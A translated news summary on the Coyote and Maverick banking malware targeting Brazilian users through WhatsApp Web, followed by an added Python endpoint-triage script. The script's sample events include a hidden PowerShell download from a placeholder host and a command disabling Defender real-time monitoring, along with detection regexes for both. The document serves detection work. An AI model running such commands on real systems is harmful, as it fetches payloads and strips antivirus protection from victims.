Security researchers have identified connections between two banking malware strains targeting users and financial institutions in Brazil: Coyote and the recently discovered Maverick. Both malicious programs are written in .NET and share identical functionality for decrypting banking URLs and monitoring financial applications. The most concerning characteristic common to both is the ability to propagate through WhatsApp Web, exploiting the app's popularity in Brazil, which has over 148 million active users.
Maverick was first documented by Trend Micro last month and attributed to a threat group named Water Saci. The campaign involves two main components: a self-propagating malware called SORVEPOTEL, which spreads through the web version of WhatsApp, and the Maverick payload itself, delivered through ZIP files. The malware monitors active browser tabs for URLs matching an encoded list of Latin American financial institutions. When a match is found, the program establishes contact with a remote server to download additional commands and serve phishing pages to steal banking credentials.
CyberProof published technical details of Maverick's infection chain. The ZIP file contains a Windows shortcut that, when executed, uses cmd.exe or PowerShell to connect to an external server and download the first-stage payload. That PowerShell script can launch intermediate tools designed to disable Microsoft Defender Antivirus and User Account Control (UAC), and it retrieves a .NET loader. The loader includes anti-analysis checks for reverse-engineering tools and a geographic gate: it installs Maverick only after confirming, through the system's timezone, language, region, and date/time format, that the victim is located in Brazil.
Trend Micro documented a new Water Saci attack chain with even more sophisticated characteristics. The attack uses email-based command and control infrastructure, employing IMAP connections to terra.com.br email accounts with hardcoded credentials. Some of these accounts are protected by multi-factor authentication, forcing attackers to manually enter one-time authentication codes. The malware implements a sophisticated remote control mechanism that allows criminals to pause, resume, and monitor WhatsApp propagation in real time, turning infected machines into a botnet. The list of supported commands includes system information collection, command execution, screen capture, file management, and even system restart or shutdown. The campaign's widespread nature is driven by WhatsApp's massive user base in Brazil, and researchers indicate that Water Saci is likely linked to Coyote, operating within the same Brazilian criminal ecosystem.
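The behaviours described above (a shortcut launching cmd.exe or PowerShell to fetch a first stage, a PowerShell step tampering with Defender, and IMAP connections to terra.com.br used as command and control) can be turned into simple endpoint triage rules. The following is an added example, not code from the researchers or the campaign: the events are constructed in a Sysmon-like shape, the explorer.exe parent and the Set-MpPreference pattern are assumptions about how the chain would surface in telemetry (the article does not name them), and the download URL is a placeholder.

```python
"""Triage process-creation and network events for the Maverick chain.
Added example; the records below are constructed samples, not telemetry."""
import re

# Constructed events (Sysmon-like: id 1 = process create, id 3 = network).
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": 'cmd.exe /c powershell -w hidden -c "iwr http://example.invalid/stage1"'},
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "powershell -c Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"id": 3, "image": r"C:\Users\u\AppData\Roaming\svc.exe",
     "dest_host": "imap.terra.com.br", "dest_port": 993},
    {"id": 3, "image": r"C:\Program Files\Mozilla Thunderbird\thunderbird.exe",
     "dest_host": "imap.terra.com.br", "dest_port": 993},
]

SHELLS = ("cmd.exe", "powershell.exe", "pwsh.exe")
MAIL_CLIENTS = ("outlook.exe", "thunderbird.exe")  # assumed allow-list
DOWNLOAD_RE = re.compile(r"(https?://|\biwr\b|invoke-webrequest|downloadstring|\bcurl\b)", re.I)
DEFENDER_RE = re.compile(r"set-mppreference|disablerealtimemonitoring", re.I)  # assumed pattern

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def triage(events):
    """Return (rule_name, image) pairs for events matching the chain."""
    hits = []
    for ev in events:
        img = basename(ev["image"])
        if ev["id"] == 1:
            parent = basename(ev["parent"])
            # Stage 1: shortcut opened from Explorer spawns a shell that downloads.
            if img in SHELLS and parent == "explorer.exe" and DOWNLOAD_RE.search(ev["cmdline"]):
                hits.append(("explorer_shell_download", img))
            # Intermediate tool: a shell changing Defender settings.
            if img in SHELLS and DEFENDER_RE.search(ev["cmdline"]):
                hits.append(("defender_tamper", img))
        elif ev["id"] == 3:
            # Email C2: IMAP to terra.com.br from anything that is not a mail client.
            if (ev["dest_port"] in (143, 993) and ev["dest_host"].endswith("terra.com.br")
                    and img not in MAIL_CLIENTS):
                hits.append(("imap_c2_non_mail_client", img))
    return hits

if __name__ == "__main__":
    for rule, image in triage(SAMPLE_EVENTS):
        print(f"{rule}: {image}")
```

The mail-client allow-list keeps the IMAP rule from firing on legitimate terra.com.br mailbox use, which is the main false-positive source for that rule.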
This post was translated and summarized from its original version using AI, with human review.
Source: The Hacker News